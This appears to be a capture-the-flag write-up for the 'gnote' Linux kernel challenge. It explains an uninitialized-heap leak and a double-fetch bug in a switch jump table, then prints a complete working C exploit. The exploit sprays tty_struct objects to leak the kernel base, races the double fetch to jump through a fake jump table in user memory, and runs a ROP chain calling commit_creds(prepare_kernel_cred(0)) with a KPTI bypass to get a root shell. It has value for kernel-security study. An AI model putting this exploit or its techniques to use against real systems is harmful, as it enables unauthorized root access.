Problem

Environment

  • linux version: 4.19.65
  • mmap_min_addr: 0x1000
  • No SMAP

Module

      typedef struct request_t {
  uint32_t cmd;
  uint32_t arg;
} request_t;

int64_t gnote_write(struct file *a1, const request_t *req, size_t a3,
                    loff_t *a4) {
  uint64_t len;
  note_data_t *req;
  void *new_note_data;

  mutex_lock(&lock);
  switch (req->cmd) {
    case 1:
      if ((uint64_t)cnt <= 7) {
        len = (uint32_t)req->arg;
        cur_note = &notes[cnt];
        cur_note->len = len;
        if (len <= 0x10000) {
          new_note_data = kmalloc(len, 0x6000C0LL);
          ++cnt;
          cur_note->data = new_note_data;
        }
      }
      break;
    case 2:
      printk("Edit Not implemented\n");
      break;
    case 3:
      printk("Delete Not implemented\n");
      break;
    case 4:
      printk("Copy Not implemented\n");
      break;
    case 5:
      if ((uint32_t)req->arg < (uint64_t)cnt) selected = (uint32_t)req->arg;
      break;
    default:
      break;
  }
  mutex_unlock(&lock);
  return a3;
}

uint64_t gnote_read(struct file *a1, char *a2, size_t len, loff_t *a4) {
  note_data_t *cur_note;

  mutex_lock(&lock);
  if (selected == -1) {
    mutex_unlock(&lock);
    return 0LL;
  } else {
    cur_note = &notes[selected];
    if (cur_note->len <= len) len = cur_note->len;
    copy_to_user(a2, cur_note->data, len);
    selected = -1LL;
    mutex_unlock(&lock);
    return len;
  }
}

The gnote module has just 3 features: add new note, select note and get note’s content. But with these features, we cannot write content to note (Edit is not implemented…).

Vulnerability

There are two vulnerabilities. First is uninitialized heap and second is double fetch bug in switch statement.

Uninitialized heap

When we add note, because the module just use kmalloc (note that kmalloc does not clear its data), we can get the previous content of allocated chunk. Therefore if the chunk was used to store vtable and the address of vtable is not cleared by SLUB or other object, we can get it.

Double fetch in switch statement

I think this is main bug of this challenge. As we know, sometimes switch statement use jump table for a speed (optimization). And the switch statement of gnote_write is implemented by jump table. But, its index (key) is obtained in user space:

gnote_write:
  ; ...
  mov     rbx, rsi; rsi is const request_t __user *buf
  mov     r12, rdx
  call    mutex_lock
  cmp     dword ptr [rbx], 5 ; rbx is const request_t __user *buf
  ja      short DEFAULT_CASE
  mov     eax, [rbx]
  mov     rax, JUMP_TABLE[rax*8]; == mov rax, QWORD PTR [rax*8 - off] where 0x3fffef68 <= off <= 0x3effff68
  jmp     __x86_indirect_thunk_rax
  ; ...

The index (key) is double-fetched from user by cmp dword ptr [rbx], 5 and mov eax, [rbx]. So if [rbx] is smaller or equal than 5 when executeing cmp dword ptr [rbx], 5 and set [rbx] to other value before mov eax, [rbx], we can use relatively arbitrary address like jump table.

Exploit

Leak kernel base

I explained above, we can leak kernel base using uninitialized heap chunk. For leaking kernel base, I use heap spray with “/dev/ptmx” (tty_struct) (see leak_kernel_base function).

Exploit switch(__x86_indirect_thunk_rax) using double fetch

We can write a code which cause crash because of invalid jump table index (key) (see jump_at_jump_table_idx, race1 and race2). However… there is not useful address in (ro)data segment of module…

I could not find the way to exploit double fetch. So I just look the assembly instructions of switch statements:

gnote_write:
  ; ...
  mov     eax, [rbx]
  mov     rax, JUMP_TABLE[rax*8]; == mov rax, QWORD PTR [rax*8 - off] where 0x3fffef68 <= off <= 0x3effff68
  jmp     __x86_indirect_thunk_rax
  ; ...

Do you notice it? the target address of jump table is calulated by key*8 - off and off is changed depending on base address of module (off = -(module_base + 0x1098)). Let’s consider off is 0x3fffef68 (this means module_base is 0xffffffffc0000000). In this assumption if rax, index (key) of jump table, is 0x7fffded, key*8 - off is 0!! So, we can access address 0 and use it as jump table!!

In given environment, SMAP is disabled. Therefore we can use stack pivoting with mmaped page with MAP_FIEXED | MAP_POPULATE. Since mmap_min_addr is 0x1000 and the minimum key for non-negative result is 0x3fffef68, I think 0x200 + 0x7fffded is best for a fixed key.

Exploit code

Because we cannot mmap with size = 0x1000000, I mmap with size = 0x400000. So, the success rate of this exploit code is 25%.

      #define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

#define VULN_DEV_WRITE_CMD_ADD 1
#define VULN_DEV_WRITE_CMD_SELECT 5
#define VULN_DEV_WRITE_CMD_MAX 6
#define VULN_DEV_MAX_NOTE_COUNT 8

#define VULN_DEV_RELATIVE_IDX_OF_NOTES_TO_JUMP_TABLE 0x26d
#define FAKE_JUMP_TABLE_ADDR ((void*)0x1000)
#define FAKE_JUMP_TABLE_SIZE 0x400000
#define FAKE_STACK_ADDR ((void*)0x5d000000)
#define FAKE_STACK_SIZE 0x6000
#define FAKE_RSP (FAKE_STACK_ADDR + 5)

#define KERNEL_BASE_START 0xffffffff81000000
#define KERNEL_BASE_END 0xffffffffc0000000
#define IS_KERNEL_BASE(x) \
  ((KERNEL_BASE_START <= (x)) && ((x) <= KERNEL_BASE_END))
#define TTY_STRUCT_OPS_OFFSET (0xffffffff81a35260 - KERNEL_BASE_START)
#define MOV_ESP_0x5d000005_OFFSET (0xffffffff811f2bba - KERNEL_BASE_START)
#define POP_RDI_OFFSET (0xffffffff8101c20d - KERNEL_BASE_START)
#define PREPARE_KERNEL_CRED_OFFSET (0xffffffff81069fe0 - KERNEL_BASE_START)
#define POP_RCX_OFFSET (0xffffffff81037523 - KERNEL_BASE_START)
#define MOV_RDI_RAX_REQ_MOV_RDI_RSI_POP_RBP_OFFSET \
  (0xffffffff81018eef - KERNEL_BASE_START)
#define COMMIT_CREDS_OFFSET (0xffffffff81069df0 - KERNEL_BASE_START)
#define BYPASS_KPTI_OFFSET (0xffffffff81600a4a - KERNEL_BASE_START)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}

uint64_t user_cs, user_ss, user_sp, user_rflags;
static void save_state() {
  asm("mov %[u_cs], cs;\n"
      "mov %[u_ss], ss;\n"
      "mov %[u_sp], rsp;\n"
      "pushf;\n"
      "pop %[u_rflags];\n"
      : [u_cs] "=r"(user_cs), [u_ss] "=r"(user_ss), [u_sp] "=r"(user_sp),
        [u_rflags] "=r"(user_rflags)::"memory");
  printf(
      "[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: "
      "0x%lx\n",
      user_cs, user_ss, user_sp, user_rflags);
}

static void get_shell() {
  puts("[+] Get shell!");
  char* argv[] = {"/bin/sh", NULL};
  char* envp[] = {NULL};
  execve("/bin/sh", argv, envp);
}

typedef struct request_t {
  uint32_t cmd;
  uint32_t arg;
} request_t;

int vuln_fd;
int vuln_dev_added_count = 0;
void vuln_dev_add(uint64_t size) {
  ++vuln_dev_added_count;
  request_t req = {.cmd = VULN_DEV_WRITE_CMD_ADD, .arg = size};
  write(vuln_fd, &req, sizeof(req));
}
void vuln_dev_select(uint64_t idx) {
  request_t req = {.cmd = VULN_DEV_WRITE_CMD_SELECT, .arg = idx};
  write(vuln_fd, &req, sizeof(req));
}

void* page_buf;
request_t* page_req;
cpu_set_t cpus[2];

uint64_t leak_kernel_base() {
  for (int cur_try = 0; cur_try <= VULN_DEV_MAX_NOTE_COUNT; ++cur_try) {
    int spray_fds[0x10];
    const int spray_obj_size = 0x2e0;
    const int spray_obj_count = sizeof(spray_fds) / sizeof(int);
    const int middle_idx = spray_obj_count / 2;
    for (int i = 0; i < spray_obj_count; ++i) {
      spray_fds[i] = open("/dev/ptmx", O_NOCTTY | O_RDONLY);
    }
    for (int i = 0; i < middle_idx; ++i) {
      close(spray_fds[i]);
    }
    vuln_dev_add(spray_obj_size);
    for (int i = middle_idx; i < spray_obj_count; ++i) {
      close(spray_fds[i]);
    }

    vuln_dev_select(cur_try);
    read(vuln_fd, page_buf, spray_obj_size);
    uint64_t maybe_tty_struct_ops = *(uint64_t*)(page_buf + 0x18);
    uint64_t maybe_kbase = maybe_tty_struct_ops - TTY_STRUCT_OPS_OFFSET;
    if ((maybe_kbase & 0xfffff) == 0 && IS_KERNEL_BASE(maybe_kbase)) {
      return maybe_kbase;
    }
  }

  return (uint64_t)-1;
}

int do_race = 0;
int jump_table_idx;
void* race1(void* arg) {
  if (sched_setaffinity(0, sizeof(cpu_set_t), arg)) {
    fatal("sched_setaffinity");
  }
  while (do_race) {
    page_req->cmd = VULN_DEV_WRITE_CMD_SELECT;
  }
}
void* race2(void* arg) {
  if (sched_setaffinity(0, sizeof(cpu_set_t), arg)) {
    fatal("sched_setaffinity");
  }
  const uint64_t const_jump_table_idx = jump_table_idx;
  while (do_race) {
    page_req->cmd = const_jump_table_idx;
  }
}

void jump_at_jump_table_idx() {
  pthread_t th1;
  pthread_create(&th1, NULL, race1, &cpus[1]);
  pthread_t th2;
  pthread_create(&th2, NULL, race2, &cpus[1]);
  do_race = 1;
  page_req->arg = 0;
  while (1) {
    page_req->cmd = VULN_DEV_WRITE_CMD_SELECT;
    write(vuln_fd, page_buf, 0x1000);
  }
}

int main() {
  for (int i = 0; i < 2; ++i) {
    CPU_ZERO(&cpus[i]);
    CPU_SET(i, &cpus[i]);
  }
  if (sched_setaffinity(0, sizeof(cpu_set_t), &cpus[0])) {
    fatal("sched_setaffinity");
  }

  save_state();

  vuln_fd = open("/proc/gnote", O_RDWR);
  if (vuln_fd < 0) {
    fatal("open(/proc/gnote)");
  }

  page_buf = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page_buf == MAP_FAILED) {
    fatal("mmap");
  }
  page_req = (request_t*)page_buf;
  printf("[*] page_buf addr: %p\n", page_buf);

  uint64_t kernel_base = leak_kernel_base();
  printf("[+] kernel_base: 0x%016lx\n", kernel_base);

  void* fake_jump_table =
      mmap(FAKE_JUMP_TABLE_ADDR, FAKE_JUMP_TABLE_SIZE, PROT_READ | PROT_WRITE,
           MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_POPULATE, -1, 0);
  if (fake_jump_table == MAP_FAILED) {
    fatal("mmap");
  }
  for (uint64_t* cur = fake_jump_table;
       (void*)cur < fake_jump_table + FAKE_JUMP_TABLE_SIZE; ++cur) {
    *cur = kernel_base + MOV_ESP_0x5d000005_OFFSET;
  }
  printf("[*] fake_jump_table addr: %p\n", fake_jump_table);

  void* fake_stack =
      mmap(FAKE_STACK_ADDR - FAKE_STACK_SIZE / 2, FAKE_STACK_SIZE,
           PROT_READ | PROT_WRITE,
           MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_POPULATE, -1, 0);
  if (fake_stack == MAP_FAILED) {
    fatal("mmap");
  }
  printf("[*] fake_stack addr: %p\n", fake_stack);

  printf("[*] Build ROP Chain @ %p...\n", fake_stack);
  uint64_t* rop_buf = FAKE_RSP;
  *rop_buf++ = kernel_base + POP_RDI_OFFSET;
  *rop_buf++ = 0;
  *rop_buf++ = kernel_base + PREPARE_KERNEL_CRED_OFFSET;
  *rop_buf++ = kernel_base + POP_RCX_OFFSET;
  *rop_buf++ = 0;
  *rop_buf++ = kernel_base + MOV_RDI_RAX_REQ_MOV_RDI_RSI_POP_RBP_OFFSET;
  *rop_buf++ = 0xdeadbeefcafebe00;
  *rop_buf++ = kernel_base + COMMIT_CREDS_OFFSET;
  *rop_buf++ = kernel_base + BYPASS_KPTI_OFFSET;
  *rop_buf++ = 0xdeadbeefcafebe01;
  *rop_buf++ = 0xdeadbeefcafebe02;
  *rop_buf++ = (uint64_t)(get_shell);  // user_rip
  *rop_buf++ = (uint64_t)(user_cs);
  *rop_buf++ = (uint64_t)(user_rflags);
  *rop_buf++ = (uint64_t)(user_sp);
  *rop_buf++ = (uint64_t)(user_ss);

  jump_table_idx = 0x200 + 0x7fffded;
  printf("[*] jump_table_idx: 0x%08x\n", jump_table_idx);
  puts("[*] Do race condition attack at jump table used in switch...");
  jump_at_jump_table_idx();

  close(vuln_fd);
  return 0;
}

Reference